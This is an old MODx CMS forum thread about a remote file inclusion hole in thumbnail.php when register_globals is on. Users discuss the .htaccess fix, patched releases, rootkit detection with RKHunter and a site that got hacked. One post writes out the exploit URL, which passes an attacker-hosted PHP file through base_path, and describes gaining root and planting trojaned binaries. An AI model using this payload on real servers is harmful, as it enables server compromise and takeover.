Re: Critical Security Measure

thanks i still dont knowing because know little,
i think the global $basepath is outside the class is this the problem.
what we need to know for secure when developing snippets
thanks in advance

Would it be helpful to add this line to the .htaccess file in the document root, if you have register_globals set to ON?

Quote from: Maaike at Nov 06, 2006, 06:22 PM

Would it be helpful to add this line to the .htaccess file in the document root, if you have register_globals set to ON?

php_flag register_globals off

Absolutely, though you have to make sure your server is configured to allow php directives in .htaccess or that will result in a 500 Internal Server Error.

This is included, commented out, in the ht.access being distributed with the 0.9.5 release candidates.

I tested it local and used a php file that i got that has tons of tools to ftp files from and to the server etc all I had to do is say thumbnail.php?base_path=http://www.myserver.tld/hackfile.php and it started that external php on my webserver and I could just upload a rootkit and got root acces on the server.

you could also use a php script that has a pice of shellcode that is included and that gives you shellacces as root also.

it was not hart at all to do. luckaly there are lots of script kiddies that do not realy know what they are dooing and just scan your machiene and try the exploit and maybe replace your index.php so that your site is defaced.

if they are more tech then they could use a rootkit and do a chroot on your server that way they replace key binaries with there own binaries like ls then when you use ls it will also open a telnet port and that way giving hackers acces to your server they can even replace your ps comand in a way that you can not see the service they started. to scan for rootkids on your server us RKHunter (rootkidHunter) to see if all the binaries are still matching the md5 hash.

if not the best thing is to roll the sytem out again.

Dimmy

There is a new Security Notices Announcement thread with RSS and Email subscription options: http://modxcms.com/forums/index.php/topic,8718.msg61285.html#msg61285

@ Ryan: Thank you a lot for implementing both wishes in this thread: RSS and Email.

This is one more piece for me to love MODx, its developers and its community more.

No worries... there’s more coming later today too

is the curent stable release updated to fix this? the 0.9.2.1?

if not whould this be a good idea?

Quote from: Dimmy at Nov 06, 2006, 11:08 PM

is the curent stable release updated to fix this? the 0.9.2.1?

The latest stable is 0.9.2.2

Thanx MODxers!

Well, I got hacked in a demo site I had listed in a forum here. Went to completely delete the directory from the server but the thumbnail.php won’t delete, says permission denied. I’ve sent the situation to my ISP to try and resolve. not good. Is this what life is like for those of you running windoze?